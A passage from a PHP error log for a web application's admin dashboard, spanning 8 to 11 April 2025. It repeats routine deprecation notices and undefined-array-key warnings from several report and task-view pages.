Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 10:19:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 10:19:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 10:19:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 10:19:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 10:19:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 10:19:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 10:21:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 10:21:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 10:28:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 10:28:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 10:29:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 10:29:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 11:09:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 11:09:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 11:10:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [08-Apr-2025 11:31:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 11:32:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 11:32:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 11:51:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 11:51:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 12:42:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 12:42:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 12:42:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 13:23:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 13:23:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 13:23:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 13:38:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 13:38:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 14:02:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 14:02:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 14:07:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 14:07:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 14:24:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 14:24:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 14:34:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 14:34:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 15:08:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 15:08:51 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:08:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:09:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:09:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 15:09:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 15:09:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:10:44 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:11:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 15:11:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 15:12:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Apr-2025 02:39:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 02:39:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [09-Apr-2025 02:39:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Apr-2025 02:40:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 02:40:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 02:40:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [09-Apr-2025 02:40:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Apr-2025 09:00:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 09:00:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [09-Apr-2025 09:00:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Apr-2025 10:52:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 10:52:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 10:52:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 10:52:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 10:52:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 11:14:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 11:14:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 13:30:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 13:31:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 13:31:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 17:06:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 17:06:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 17:06:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 03:51:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 03:51:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Apr-2025 03:51:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [10-Apr-2025 06:53:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 06:54:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 06:54:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 09:39:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 09:41:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Apr-2025 09:41:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Apr-2025 09:41:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Apr-2025 09:41:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Apr-2025 09:41:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Apr-2025 09:41:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [10-Apr-2025 09:45:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 09:45:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 10:16:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 10:16:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 10:30:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 10:30:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 11:06:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 11:06:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 11:52:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 12:31:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 13:11:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 13:11:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 13:11:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 13:20:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 13:59:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 13:59:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 14:27:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 14:27:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 15:31:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 15:31:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 15:31:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 15:31:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 15:31:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 15:31:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 15:44:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 15:44:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 15:44:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 17:18:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 17:18:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 17:18:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 18:09:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 18:10:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 18:10:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 18:15:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 18:15:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 18:17:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 18:17:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 18:28:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 18:28:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 23:48:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 23:49:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 23:49:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 23:50:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Apr-2025 23:50:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [11-Apr-2025 07:58:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 07:58:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 07:58:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 08:06:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 08:06:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 08:43:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 08:55:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 08:55:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 11:57:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 12:02:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 12:03:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 12:03:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 12:03:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 12:04:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 12:05:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 12:05:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 12:10:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 12:11:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 